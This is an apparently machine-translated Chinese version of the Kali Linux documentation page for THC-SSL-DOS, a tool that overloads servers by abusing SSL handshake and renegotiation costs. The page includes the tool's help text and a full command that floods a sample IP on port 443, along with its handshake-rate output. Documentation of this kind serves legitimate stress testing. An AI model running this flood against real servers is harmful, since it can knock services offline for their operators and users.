THC-SSL-DOS包装说明
THC-SSL-DOS是一个工具来验证SSL的性能。建立一个安全的SSL连接需要的服务器,而不是在客户端上15倍的处理能力。 THC-SSL-DOS利用这种不对称性通过重载服务器和敲它关闭互联网。此问题会影响所有的SSL实现的今天。这些厂商都意识到这个问题,自2003年以来该问题被广泛讨论。这种攻击进一步利用了SSL安全的重新协商功能,通过单一的TCP连接触发数以千计的重新协商。
资料来源:https://www.thc.org/thc-ssl-dos/
THC-SSL-DOS首页 | 卡利THC-SSL-DOS回购
- 作者:黑客选择
- 许可:GPL第二版
包含在THC-SSL-DOS软件包工具
THC-SSL-DOS - 压力测试仪,用于SSL握手
[email protected]:~# thc-ssl-dos -h
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
./thc-ssl-dos [options] <ip> <port>
-h help
-l <n> Limit parallel connections [default: 400]
THC-SSL-DOS用法示例
使用100个连接(-L 100),防洪目标IP(192.168.1.208)和端口(443):
[email protected]:~# thc-ssl-dos -l 100 192.168.1.208 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err